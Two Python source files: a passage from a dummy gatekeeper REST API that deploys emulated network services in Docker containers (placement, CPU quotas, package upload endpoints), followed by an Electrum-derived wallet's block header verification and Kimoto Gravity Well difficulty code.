continue # skip if no deployment unit is present
# iterate over all involved deployment units
for uvnfi in units:
# Attention: we apply a simplification for multi DU VNFs here:
# the connection points of all involved DUs have to have the same
# name as the connection points of the surrounding VNF to be mapped.
# This is because we do not consider links specified in the VNFDs
container_name = uvnfi.name
ip_address = None
# get the interface of the unit
intf = self._get_vnfd_cp_from_vnfi(uvnfi, intf_name)
# check if there is a manually assigned address
if intf is not None:
if intf.get("address"):
ip_address = intf.get("address")
if ip_address is None:
# automatically assign an IP from our pool
ip_address = "{0}/{1}".format(str(lan_hosts.pop(0)),
lan_net.prefixlen)
LOG.debug(
"Setting up E-LAN/E-Tree interface. (%s:%s) -> %s" % (
container_name, intf_name, ip_address))
# re-configure the VNFs IP assignment and ensure that a new subnet is used for each E-LAN
# E-LAN relies on the learning switch capability of Ryu which has to be turned on in the topology
# (DCNetwork(controller=RemoteController, enable_learning=True)), so no explicit chaining is
# necessary.
vnfi = self._get_vnf_instance(instance_uuid, container_name)
if vnfi is not None:
self._vnf_reconfigure_network(vnfi, intf_name, ip_address)
# add this vnf and interface to the E-LAN for tagging
elan_vnf_list.append(
{'name': container_name, 'interface': intf_name})
# install the VLAN tags for this E-LAN
GK.net.setLAN(elan_vnf_list)
def _load_docker_files(self):
"""
Get all paths to Dockerfiles from VNFDs and store them in dict.
:return:
"""
for vnf_id, v in self.vnfds.items():
for vu in v.get("virtual_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, vu.get("id"))
if vu.get("vm_image_format") == "docker":
vm_image = vu.get("vm_image")
docker_path = os.path.join(
self.package_content_path,
make_relative_path(vm_image))
self.local_docker_files[vnf_container_name] = docker_path
LOG.debug("Found Dockerfile (%r): %r" % (vnf_container_name, docker_path))
for cu in v.get("cloudnative_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, cu.get("id"))
image = cu.get("image")
docker_path = os.path.join(
self.package_content_path,
make_relative_path(image))
self.local_docker_files[vnf_container_name] = docker_path
LOG.debug("Found Dockerfile (%r): %r" % (vnf_container_name, docker_path))
def _load_docker_urls(self):
"""
Get all URLs to pre-build docker images in some repo.
:return:
"""
for vnf_id, v in list(self.vnfds.items()):
for vu in v.get("virtual_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, vu.get("id"))
if vu.get("vm_image_format") == "docker":
url = vu.get("vm_image")
if url is not None:
url = url.replace("http://", "")
self.remote_docker_image_urls[vnf_container_name] = url
LOG.debug("Found Docker image URL (%r): %r" %
(vnf_container_name,
self.remote_docker_image_urls[vnf_container_name]))
for cu in v.get("cloudnative_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, cu.get("id"))
url = cu.get("image")
if url is not None:
url = url.replace("http://", "")
self.remote_docker_image_urls[vnf_container_name] = url
LOG.debug("Found Docker image URL (%r): %r" %
(vnf_container_name,
self.remote_docker_image_urls[vnf_container_name]))
def _build_images_from_dockerfiles(self):
"""
Build Docker images for each local Dockerfile found in the package: self.local_docker_files
"""
if GK_STANDALONE_MODE:
return # do not build anything in standalone mode
dc = DockerClient()
LOG.info("Building %d Docker images (this may take several minutes) ..." % len(
self.local_docker_files))
for k, v in list(self.local_docker_files.items()):
for line in dc.build(path=v.replace(
"Dockerfile", ""), tag=k, rm=False, nocache=False):
LOG.debug("DOCKER BUILD: %s" % line)
LOG.info("Docker image created: %s" % k)
def _pull_predefined_dockerimages(self):
"""
        If the package contains URLs to pre-built Docker images, we download them with this method.
"""
dc = DockerClient()
for url in list(self.remote_docker_image_urls.values()):
# only pull if not present (speedup for development)
if not FORCE_PULL:
if len(dc.images.list(name=url)) > 0:
LOG.debug("Image %r present. Skipping pull." % url)
continue
LOG.info("Pulling image: %r" % url)
# this seems to fail with latest docker api version 2.0.2
# dc.images.pull(url,
# insecure_registry=True)
# using docker cli instead
cmd = ["docker",
"pull",
url,
]
Popen(cmd).wait()
def _check_docker_image_exists(self, image_name):
"""
Query the docker service and check if the given image exists
:param image_name: name of the docker image
:return:
"""
return len(DockerClient().images.list(name=image_name)) > 0
def _place(self, vnfd, vnfid, vdu, ssiid):
"""
Do placement. Return the name of the DC to place
the given VDU.
"""
assert(len(self.vnfds) > 0)
assert(len(GK.dcs) > 0)
if PLACEMENT_ALGORITHM_OBJ is None:
LOG.error("No placement algorithm given. Using FirstDcPlacement!")
p = FirstDcPlacement()
else:
p = PLACEMENT_ALGORITHM_OBJ
cname = get_container_name(vnfid, vdu.get("id"), ssiid)
rdc = p.place(GK.dcs, vnfd, vnfid, vdu, ssiid, cname)
LOG.info("Placement: '{}' --> '{}'".format(cname, rdc))
return rdc
def _calculate_cpu_cfs_values(self, cpu_time_percentage):
"""
Calculate cpu period and quota for CFS
:param cpu_time_percentage: percentage of overall CPU to be used
:return: cpu_period, cpu_quota
"""
if cpu_time_percentage is None:
return -1, -1
if cpu_time_percentage < 0:
return -1, -1
# (see: https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt)
        # Attention: the minimum accepted cpu_quota is 1 ms (1000 microseconds)
        cpu_period = 1000000  # let's use a fixed period of 1000000 microseconds for now
LOG.debug("cpu_period is %r, cpu_percentage is %r" %
(cpu_period, cpu_time_percentage))
# calculate the fraction of cpu time for this container
cpu_quota = cpu_period * cpu_time_percentage
        # ATTENTION: keep cpu_quota >= 1000, the kernel's 1 ms minimum CFS quota,
        # otherwise container creation fails with an invalid argument error
if cpu_quota < 1000:
LOG.debug("cpu_quota before correcting: %r" % cpu_quota)
cpu_quota = 1000
LOG.warning("Increased CPU quota to avoid system error.")
LOG.debug("Calculated: cpu_period=%f / cpu_quota=%f" %
(cpu_period, cpu_quota))
return int(cpu_period), int(cpu_quota)
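# Worked example for _calculate_cpu_cfs_values above (illustrative only):
# with the fixed cpu_period of 1000000 us, a cpu_time_percentage of 0.25 yields
# cpu_quota = 1000000 * 0.25 = 250000 us, i.e. a quarter of one CPU core.
# A very small request such as 0.0005 would give 500 us and is therefore clamped
# to the 1000 us minimum enforced above; None or negative inputs return (-1, -1).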
"""
Some (simple) placement algorithms
"""
class FirstDcPlacement(object):
"""
Placement: Always use one and the same data center from the GK.dcs dict.
"""
def place(self, dcs, vnfd, vnfid, vdu, ssiid, cname):
return list(dcs.values())[0]
class RoundRobinDcPlacement(object):
"""
Placement: Distribute VNFs across all available DCs in a round robin fashion.
"""
def __init__(self):
self.count = 0
def place(self, dcs, vnfd, vnfid, vdu, ssiid, cname):
dcs_list = list(dcs.values())
rdc = dcs_list[self.count % len(dcs_list)]
self.count += 1 # inc. count to use next DC
return rdc
class StaticConfigPlacement(object):
"""
Placement: Fixed assignment based on config file.
"""
def __init__(self, path=None):
if path is None:
path = "static_placement.yml"
path = os.path.expanduser(path)
self.static_placement = dict()
try:
self.static_placement = load_yaml(path)
except BaseException as ex:
LOG.error(ex)
LOG.error("Couldn't load placement from {}"
.format(path))
LOG.info("Loaded static placement: {}"
.format(self.static_placement))
def place(self, dcs, vnfd, vnfid, vdu, ssiid, cname):
# check for container name entry
if cname not in self.static_placement:
LOG.error("Coudn't find {} in placement".format(cname))
LOG.error("Using first DC as fallback!")
return list(dcs.values())[0]
# lookup
candidate_dc = self.static_placement.get(cname)
        # check if the DC exists
        if candidate_dc not in dcs:
            LOG.error("Couldn't find DC {}".format(candidate_dc))
LOG.error("Using first DC as fallback!")
return list(dcs.values())[0]
# return correct DC
return dcs.get(candidate_dc)
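# A hypothetical static_placement.yml for StaticConfigPlacement could map container
# names (as produced by get_container_name) to data center names known in GK.dcs,
# e.g. (sketch only; the names below are made up):
#
#   vnf0.vdu01.0: dc1
#   vnf1.vdu01.0: dc2
#
# Entries that are missing, or that reference an unknown DC, fall back to the first
# DC, as implemented in place() above.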
"""
Resource definitions and API endpoints
"""
class Packages(fr.Resource):
def post(self):
"""
Upload a *.son service package to the dummy gatekeeper.
We expect request with a *.son file and store it in UPLOAD_FOLDER
:return: UUID
"""
try:
# get file contents
LOG.info("POST /packages called")
            # let's search for the package in the request
is_file_object = False # make API more robust: file can be in data or in files field
if "package" in request.files:
son_file = request.files["package"]
is_file_object = True
elif len(request.data) > 0:
son_file = request.data
else:
return {"service_uuid": None, "size": 0, "sha1": None,
"error": "upload failed. file not found."}, 500
# generate a uuid to reference this package
service_uuid = str(uuid.uuid4())
file_hash = str(son_file)
file_hash = hashlib.sha1(file_hash.encode())
file_hash = file_hash.hexdigest()
# ensure that upload folder exists
ensure_dir(UPLOAD_FOLDER)
            upload_path = os.path.join(
                UPLOAD_FOLDER, "%s.tgo" % service_uuid)
# store *.son file to disk
if is_file_object:
son_file.save(upload_path)
else:
with open(upload_path, 'wb') as f:
f.write(son_file)
size = os.path.getsize(upload_path)
# first stop and delete any other running services
if AUTO_DELETE:
service_list = copy.copy(GK.services)
                # use a separate loop variable so we do not overwrite the
                # uuid of the newly uploaded service
                for old_service_uuid in service_list:
                    instances_list = copy.copy(
                        GK.services[old_service_uuid].instances)
                    for instance_uuid in instances_list:
                        # valid service and instance UUID, stop service
                        GK.services.get(old_service_uuid).stop_service(
                            instance_uuid)
                        LOG.info("service instance with uuid %r stopped." %
                                 instance_uuid)
# create a service object and register it
s = Service(service_uuid, file_hash, upload_path)
GK.register_service_package(service_uuid, s)
# automatically deploy the service
if AUTO_DEPLOY:
                # ok, we have a service uuid, let's start the service
reset_subnets()
GK.services.get(service_uuid).start_service()
# generate the JSON result
return {"service_uuid": service_uuid, "size": size,
"sha1": file_hash, "error": None}, 201
except BaseException:
LOG.exception("Service package upload failed:")
return {"service_uuid": None, "size": 0,
"sha1": None, "error": "upload failed"}, 500
def get(self):
"""
Return a list of package descriptor headers.
Fakes the behavior of 5GTANGO's GK API to be
compatible with tng-cli.
:return: list
"""
LOG.info("GET /packages")
result = list()
for suuid, sobj in GK.services.items():
pkg = dict()
pkg["pd"] = dict()
pkg["uuid"] = suuid
pkg["pd"]["name"] = sobj.manifest.get("name")
pkg["pd"]["version"] = sobj.manifest.get("version")
pkg["created_at"] = sobj.created_at
result.append(pkg)
return result, 200, CORS_HEADER
class Services(fr.Resource):
def get(self):
"""
Return a list of services.
Fakes the behavior of 5GTANGO's GK API to be
compatible with tng-cli.
:return: list
"""
LOG.info("GET /services")
result = list()
for suuid, sobj in GK.services.items():
service = dict()
service["nsd"] = dict()
service["uuid"] = suuid
service["nsd"]["name"] = sobj.nsd.get("name")
service["nsd"]["version"] = sobj.nsd.get("version")
service["created_at"] = sobj.created_at
result.append(service)
return result, 200, CORS_HEADER
class Instantiations(fr.Resource):
def post(self):
"""
Instantiate a service specified by its UUID.
Will return a new UUID to identify the running service instance.
:return: UUID
"""
LOG.info("POST /instantiations (or /requests) called")
# try to extract the service uuid from the request
json_data = request.get_json(force=True)
service_uuid = json_data.get("service_uuid")
service_name = json_data.get("service_name")
if service_name is None:
            # let's be fuzzy
service_name = service_uuid
# first try to find by service_name
if service_name is not None:
for s_uuid, s in GK.services.items():
if s.manifest.get("name") == service_name:
LOG.info("Searched for: {}. Found service w. UUID: {}"
.format(service_name, s_uuid))
service_uuid = s_uuid
        # let's be a bit fuzzy here to make testing easier
        if (service_uuid is None or service_uuid ==
                "latest") and len(GK.services) > 0:
            # if we don't get a service uuid, we simply start the first service
            # in the list
service_uuid = list(GK.services.keys())[0]
if service_uuid in GK.services:
            # ok, we have a service uuid, let's start the service
service_instance_uuid = GK.services.get(
service_uuid).start_service()
# multiple ID fields to be compatible with tng-bench and tng-cli
return ({"service_instance_uuid": service_instance_uuid,
"id": service_instance_uuid}, 201)
LOG.error("Service not found: {}/{}".format(service_uuid, service_name))
return "Service not found", 404
def get(self):
"""
Returns a list of UUIDs containing all running services.
:return: dict / list
"""
LOG.debug("GET /instantiations or /api/v3/records/services")
# return {"service_instantiations_list": [
# list(s.instances.keys()) for s in GK.services.values()]}
result = list()
for suuid, sobj in GK.services.items():
for iuuid, iobj in sobj.instances.items():
inst = dict()
inst["uuid"] = iobj.get("uuid")
inst["instance_name"] = "{}-inst.{}".format(
iobj.get("name"), iobj.get("ssiid"))
inst["status"] = "running"
inst["created_at"] = iobj.get("created_at")
result.append(inst)
return result, 200, CORS_HEADER
def delete(self):
"""
Stops a running service specified by its service and instance UUID.
"""
# try to extract the service and instance UUID from the request
json_data = request.get_json(force=True)
service_uuid_input = json_data.get("service_uuid")
instance_uuid_input = json_data.get("service_instance_uuid")
if len(GK.services) < 1:
return "No service on-boarded.", 404
# try to be fuzzy
if service_uuid_input is None:
# if we don't get a service uuid we stop all services
service_uuid_list = list(GK.services.keys())
LOG.info("No service_uuid given, stopping all.")
else:
service_uuid_list = [service_uuid_input]
# for each service
for service_uuid in service_uuid_list:
if instance_uuid_input is None:
instance_uuid_list = list(
GK.services[service_uuid].instances.keys())
else:
instance_uuid_list = [instance_uuid_input]
# for all service instances
for instance_uuid in instance_uuid_list:
if (service_uuid in GK.services and
instance_uuid in GK.services[service_uuid].instances):
# valid service and instance UUID, stop service
GK.services.get(service_uuid).stop_service(instance_uuid)
LOG.info("Service instance with uuid %r stopped." % instance_uuid)
return "Service(s) stopped.", 200
class Exit(fr.Resource):
def put(self):
"""
Stop the running Containernet instance regardless of data transmitted
"""
list(GK.dcs.values())[0].net.stop()
def generate_subnets(prefix, base, subnet_size=50, mask=24):
    # Generate a list of IP networks (subnets)
r = list()
for net in range(base, base + subnet_size):
subnet = "{0}.{1}.0/{2}".format(prefix, net, mask)
try:
r.append(ipaddress.ip_network(subnet))
except ValueError:
r.append(ipaddress.ip_network(unicode(subnet)))
return r
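# Example (illustrative): generate_subnets('30.0', 0, subnet_size=2, mask=24)
# returns [IPv4Network('30.0.0.0/24'), IPv4Network('30.0.1.0/24')], which is the
# scheme used below to build the ELAN_SUBNETS and ELINE_SUBNETS pools.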
def reset_subnets():
global ELINE_SUBNETS
global ELAN_SUBNETS
# private subnet definitions for the generated interfaces
# 30.0.xxx.0/24
ELAN_SUBNETS = generate_subnets('30.0', 0, subnet_size=50, mask=24)
# 20.0.xxx.0/24
ELINE_SUBNETS = generate_subnets('20.0', 0, subnet_size=50, mask=24)
def initialize_GK():
global GK
GK = Gatekeeper()
# create a single, global GK object
GK = None
initialize_GK()
# setup Flask
http_server = None
app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 512 * 1024 * 1024 # 512 MB max upload
api = fr.Api(app)
# define endpoints
api.add_resource(Packages, '/packages', '/api/v2/packages', '/api/v3/packages')
api.add_resource(Services, '/services', '/api/v2/services', '/api/v3/services')
api.add_resource(Instantiations, '/instantiations',
'/api/v2/instantiations', '/api/v2/requests', '/api/v3/requests',
'/api/v3/records/services')
api.add_resource(Exit, '/emulator/exit')
def start_rest_api(host, port, datacenters=dict()):
global http_server
GK.dcs = datacenters
GK.net = get_dc_network()
# start the Flask server (not the best performance but ok for our use case)
# app.run(host=host,
# port=port,
# debug=True,
# use_reloader=False # this is needed to run Flask in a non-main thread
# )
http_server = WSGIServer((host, port), app, log=open("/dev/null", "w"))
http_server.serve_forever()
def stop_rest_api():
if http_server:
http_server.close()
def ensure_dir(name):
if not os.path.exists(name):
os.makedirs(name)
def load_yaml(path):
with open(path, "r") as f:
try:
r = yaml.load(f)
except yaml.YAMLError as exc:
LOG.exception("YAML parse error: %r" % str(exc))
r = dict()
return r
def make_relative_path(path):
if path.startswith("file://"):
path = path.replace("file://", "", 1)
if path.startswith("/"):
path = path.replace("/", "", 1)
return path
def get_dc_network():
"""
    Retrieve the DCNetwork to which this dummy gatekeeper (GK) is connected.
    Assumes at least one data center is connected to this GK and that all data centers belong to the same DCNetwork.
:return:
"""
assert (len(GK.dcs) > 0)
return list(GK.dcs.values())[0].net
def parse_interface(interface_name):
"""
    Convert the interface name in the NSD to the corresponding vnf_id and vnf_interface names.
:param interface_name:
:return:
"""
if ':' in interface_name:
vnf_id, vnf_interface = interface_name.split(':')
else:
vnf_id = None
vnf_interface = interface_name
return vnf_id, vnf_interface
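# Usage sketch for parse_interface (illustrative):
#   parse_interface("vnf0:input")  -> ("vnf0", "input")
#   parse_interface("mgmt")        -> (None, "mgmt")   # NS connection point, no VNF id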
def get_container_name(vnf_id, vdu_id, ssiid=None):
if ssiid is not None:
return "{}.{}.{}".format(vnf_id, vdu_id, ssiid)
return "{}.{}".format(vnf_id, vdu_id)
def get_triple_id(descr):
return "{}.{}.{}".format(
descr.get("vendor"), descr.get("name"), descr.get("version"))
def update_port_mapping_multi_instance(ssiid, port_bindings):
"""
Port_bindings are used to expose ports of the deployed containers.
They would collide if we deploy multiple service instances.
    This function adds an offset of MULTI_INSTANCE_PORT_OFFSET * SSIID to them,
    based on the short service instance id (SSIID).
"""
def _offset(p):
return p + MULTI_INSTANCE_PORT_OFFSET * ssiid
port_bindings = {k: _offset(v) for k, v in port_bindings.items()}
return port_bindings
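# Illustrative example: assuming MULTI_INSTANCE_PORT_OFFSET is 1000 (a made-up value;
# the real constant is defined elsewhere in this file), a service instance with
# ssiid=2 and port_bindings={80: 8080} would be rewritten to {80: 10080}, so that
# multiple instances of the same service do not collide on the host ports.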
if __name__ == '__main__':
"""
    Allow running the API in standalone mode.
"""
GK_STANDALONE_MODE = True
logging.getLogger("werkzeug").setLevel(logging.INFO)
start_rest_api("0.0.0.0", 8000)
|
blockchain.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@ecdsa.org
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import util
import bitcoin
from bitcoin import *
#import lyra2re_hash
#import lyra2re2_hash
import fjc_scrypt
MAX_TARGET = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
class Blockchain(util.PrintError):
'''Manages blockchain headers and their verification'''
def __init__(self, config, network):
self.config = config
self.network = network
self.checkpoint_height, self.checkpoint_hash = self.get_checkpoint()
self.check_truncate_headers()
self.set_local_height()
def height(self):
return self.local_height
def init(self):
import threading
if os.path.exists(self.path()):
self.downloading_headers = False
return
self.downloading_headers = True
t = threading.Thread(target=self.init_headers_file)
t.daemon = True
t.start()
def pass_checkpoint(self, header):
if type(header) is not dict:
return False
if header.get('block_height') != self.checkpoint_height:
return True
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00' * 32
try:
_hash = self.hash_header(header)
except:
return False
return _hash == self.checkpoint_hash
def verify_header(self, header, prev_header, bits, target):
prev_hash = self.hash_header(prev_header)
_hash = self.hash_header(header)
_powhash = self.pow_hash_header(header)
if prev_hash != header.get('prev_block_hash'):
raise BaseException("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if not self.pass_checkpoint(header):
raise BaseException('failed checkpoint')
if self.checkpoint_height == header.get('block_height'):
self.print_error("validated checkpoint", self.checkpoint_height)
if bitcoin.TESTNET:
return
if bits != header.get('bits'):
raise BaseException("bits mismatch: %s vs %s for height %s" % (bits, header.get('bits'), header.get('block_height')))
if int('0x' + _powhash, 16) > target:
raise BaseException("insufficient proof of work: %s vs target %s" % (int('0x' + _powhash, 16), target))
def verify_chain(self, chain):
first_header = chain[0]
prev_header = self.read_header(first_header.get('block_height') - 1)
for header in chain:
height = header.get('block_height')
bits, target = self.get_target(height, chain)
self.verify_header(header, prev_header, bits, target)
prev_header = header
def verify_chunk(self, index, data):
num = len(data) / 80
prev_header = None
if index != 0:
prev_header = self.read_header(index * 2016 - 1)
headers = []
for i in range(num):
raw_header = data[i * 80:(i + 1) * 80]
header = self.deserialize_header(raw_header, index * 2016 + i)
headers.append(header)
bits, target = self.get_target(index*2016 + i, headers)
self.verify_header(header, prev_header, bits, target)
prev_header = header
def serialize_header(self, res):
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
return s
def deserialize_header(self, s, height):
hex_to_int = lambda s: int('0x' + s[::-1].encode('hex'), 16)
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['block_height'] = height
return h
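    # Layout of the 80-byte serialized header used by the two methods above
    # (integer fields little-endian; the two hash fields are stored byte-reversed
    # relative to their displayed hex form, handled by rev_hex / hash_encode):
    #   bytes  0-3   version
    #   bytes  4-35  prev_block_hash
    #   bytes 36-67  merkle_root
    #   bytes 68-71  timestamp
    #   bytes 72-75  bits (compact difficulty target)
    #   bytes 76-79  nonce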
def hash_header(self, header):
if header is None:
return '0' * 64
return hash_encode(Hash(self.serialize_header(header).decode('hex')))
def pow_hash_header(self, header):
return rev_hex(fjc_scrypt.getPoWHash(self.serialize_header(header).decode('hex')).encode('hex'))
def path(self):
return util.get_headers_path(self.config)
def init_headers_file(self):
filename = self.path()
try:
import urllib, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.HEADERS_URL)
urllib.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
self.downloading_headers = False
self.set_local_height()
self.print_error("%d blocks" % self.local_height)
def save_chunk(self, index, chunk):
filename = self.path()
f = open(filename, 'rb+')
f.seek(index * 2016 * 80)
h = f.write(chunk)
f.close()
self.set_local_height()
def save_header(self, header):
data = self.serialize_header(header).decode('hex')
assert len(data) == 80
height = header.get('block_height')
filename = self.path()
f = open(filename, 'rb+')
f.seek(height * 80)
h = f.write(data)
f.close()
self.set_local_height()
def set_local_height(self):
self.local_height = 0
name = self.path()
if os.path.exists(name):
h = os.path.getsize(name) / 80 - 1
if self.local_height != h:
self.local_height = h
def read_header(self, block_height):
name = self.path()
if os.path.exists(name):
f = open(name, 'rb')
f.seek(block_height * 80)
h = f.read(80)
f.close()
if len(h) == 80:
h = self.deserialize_header(h, block_height)
return h
def BIP9(self, height, flag):
v = self.read_header(height)['version']
return ((v & 0xE0000000) == 0x20000000) and ((v & flag) == flag)
def segwit_support(self, N=576):
h = self.local_height
return sum([self.BIP9(h - i, 2) for i in range(N)]) * 10000 / N / 100.
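    # Note on the BIP9 check above: a block signals a BIP9 deployment when its top
    # three version bits equal 001 (version & 0xE0000000 == 0x20000000) and the
    # deployment's bit is set; segwit_support() samples this for bit 1 (flag=2)
    # over the last N blocks and returns the share as a percentage.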
def check_truncate_headers(self):
checkpoint = self.read_header(self.checkpoint_height)
if checkpoint is None:
return
if self.hash_header(checkpoint) == self.checkpoint_hash:
return
self.print_error('checkpoint mismatch:', self.hash_header(checkpoint), self.checkpoint_hash)
self.print_error('Truncating headers file at height %d' % self.checkpoint_height)
name = self.path()
f = open(name, 'rb+')
f.seek(self.checkpoint_height * 80)
f.truncate()
f.close()
def convbits(self, new_target):
c = ("%064x" % new_target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) / 2, int('0x' + c[:6], 16)
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
new_bits = bitsN << 24 | bitsBase
return new_bits
def convbignum(self, bits):
bitsN = (bits >> 24) & 0xff
if not (bitsN >= 0x03 and bitsN <= 0x1e):
raise BaseException("First part of bits should be in [0x03, 0x1e]")
bitsBase = bits & 0xffffff
if not (bitsBase >= 0x8000 and bitsBase <= 0x7fffff):
raise BaseException("Second part of bits should be in [0x8000, 0x7fffff]")
target = bitsBase << (8 * (bitsN-3))
return target
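    # Worked example (illustrative): convbignum(0x1e0ffff0) gives bitsN = 0x1e and
    # bitsBase = 0x0ffff0, so target = 0x0ffff0 << (8 * (0x1e - 3)), which equals
    # 0x00000FFFF0000000000000000000000000000000000000000000000000000000 -- the
    # genesis target returned by get_target() for height 0 below.
    # convbits() performs the inverse compact encoding.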
def KimotoGravityWell(self, height, chain=[], data=None):
# print_msg ("height=",height,"chain=", chain, "data=", data)
        BlocksTargetSpacing = 1 * 60  # 1 minute
TimeDaySeconds = 60 * 60 * 24
PastSecondsMin = TimeDaySeconds * 0.25
PastSecondsMax = TimeDaySeconds * 7
PastBlocksMin = PastSecondsMin / BlocksTargetSpacing
PastBlocksMax = PastSecondsMax / BlocksTargetSpacing
BlockReadingIndex = height - 1
BlockLastSolvedIndex = height - 1
TargetBlocksSpacingSeconds = BlocksTargetSpacing
PastRateAdjustmentRatio = 1.0
bnProofOfWorkLimit = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if (BlockLastSolvedIndex <= 0 or BlockLastSolvedIndex < PastBlocksMin):
new_target = bnProofOfWorkLimit
new_bits = self.convbits(new_target)
return new_bits, new_target
last = self.read_header(BlockLastSolvedIndex)
        if last is None:
for h in chain:
if h.get('block_height') == BlockLastSolvedIndex:
last = h
break
for i in xrange(1, int(PastBlocksMax) + 1):
PastBlocksMass = i
reading = self.read_header(BlockReadingIndex)
            if reading is None:
for h in chain:
if h.get('block_height') == BlockReadingIndex:
# print_msg("get block from chain")
reading = h
break
            if (reading is None or last is None):
raise BaseException("Could not find previous blocks when calculating difficulty reading: "
+ str(BlockReadingIndex) + ", last: " + str(BlockLastSolvedIndex) + ", height: " + str(height))
# print_msg ("last=",last)
if (i == 1):
# print_msg("reading(", BlockReadingIndex, ")=", reading)
PastDifficultyAverage = self.convbignum(reading.get('bits'))
else:
PastDifficultyAverage = float(
(self.convbignum(reading.get('bits')) - PastDifficultyAveragePrev) / float(
i)) + PastDifficultyAveragePrev
PastDifficultyAveragePrev = PastDifficultyAverage
PastRateActualSeconds = last.get('timestamp') - reading.get('timestamp')
PastRateTargetSeconds = TargetBlocksSpacingSeconds * PastBlocksMass
PastRateAdjustmentRatio = 1.0
if (PastRateActualSeconds < 0):
PastRateActualSeconds = 0.0
if (PastRateActualSeconds != 0 and PastRateTargetSeconds != 0):
PastRateAdjustmentRatio = float(PastRateTargetSeconds) / float(PastRateActualSeconds)
EventHorizonDeviation = 1 + (0.7084 * pow(float(PastBlocksMass) / float(144), -1.228))
EventHorizonDeviationFast = EventHorizonDeviation
EventHorizonDeviationSlow = float(1) / float(EventHorizonDeviation)
# print_msg ("EventHorizonDeviation=",EventHorizonDeviation,"EventHorizonDeviationFast=",EventHorizonDeviationFast,"EventHorizonDeviationSlow=",EventHorizonDeviationSlow )
if (PastBlocksMass >= PastBlocksMin):
if ((PastRateAdjustmentRatio <= EventHorizonDeviationSlow) or (
PastRateAdjustmentRatio >= EventHorizonDeviationFast)):
break
if (BlockReadingIndex < 1):
break
BlockReadingIndex = BlockReadingIndex - 1
# print_msg ("BlockReadingIndex=",BlockReadingIndex )
# print_msg ("for end: PastBlocksMass=",PastBlocksMass )
bnNew = PastDifficultyAverage
if (PastRateActualSeconds != 0 and PastRateTargetSeconds != 0):
bnNew *= float(PastRateActualSeconds)
bnNew /= float(PastRateTargetSeconds)
if (bnNew > bnProofOfWorkLimit):
bnNew = bnProofOfWorkLimit
# new target
new_target = bnNew
new_bits = self.convbits(new_target)
# print_msg("bits", new_bits , "(", hex(new_bits),")")
# print_msg ("PastRateAdjustmentRatio=",PastRateAdjustmentRatio,"EventHorizonDeviationSlow",EventHorizonDeviationSlow,"PastSecondsMin=",PastSecondsMin,"PastSecondsMax=",PastSecondsMax,"PastBlocksMin=",PastBlocksMin,"PastBlocksMax=",PastBlocksMax)
return new_bits, new_target
def get_target(self, height, chain=None):
if bitcoin.TESTNET:
return 0, 0
if height == 0:
return 0x1e0ffff0, 0x00000FFFF0000000000000000000000000000000000000000000000000000000
return self.KimotoGravityWell(height, chain)
def connect_header(self, chain, header):
'''Builds a header chain until it connects. Returns True if it has
successfully connected, False if verification failed, otherwise the
height of the next header needed.'''
chain.append(header) # Ordered by decreasing height
previous_height = header['block_height'] - 1
previous_header = self.read_header(previous_height)
# Missing header, request it
if not previous_header:
return previous_height
# Does it connect to my chain?
prev_hash = self.hash_header(previous_header)
if prev_hash != header.get('prev_block_hash'):
self.print_error("reorg")
return previous_height
# The chain is complete. Reverse to order by increasing height
chain.reverse()
try:
self.verify_chain(chain)
self.print_error("new height:", previous_height + len(chain))
for header in chain:
self.save_header(header)
return True
except BaseException as e:
self.print_error(str(e))
return False
def connect_chunk(self, idx, hexdata):
try:
data = hexdata.decode('hex')
self.verify_chunk(idx, data)
self.print_error("validated chunk %d" % idx)
self.save_chunk(idx, data)
return idx + 1
except BaseException as e:
self.print_error('verify_chunk failed', str(e))
return idx - 1
def get_checkpoint(self):
height = self.config.get('checkpoint_height', 0)
value = self.config.get('checkpoint_value', bitcoin.GENESIS)
return (height, value)
def set_checkpoint(self, height, value):
self.checkpoint_height = height
self.checkpoint_hash = value
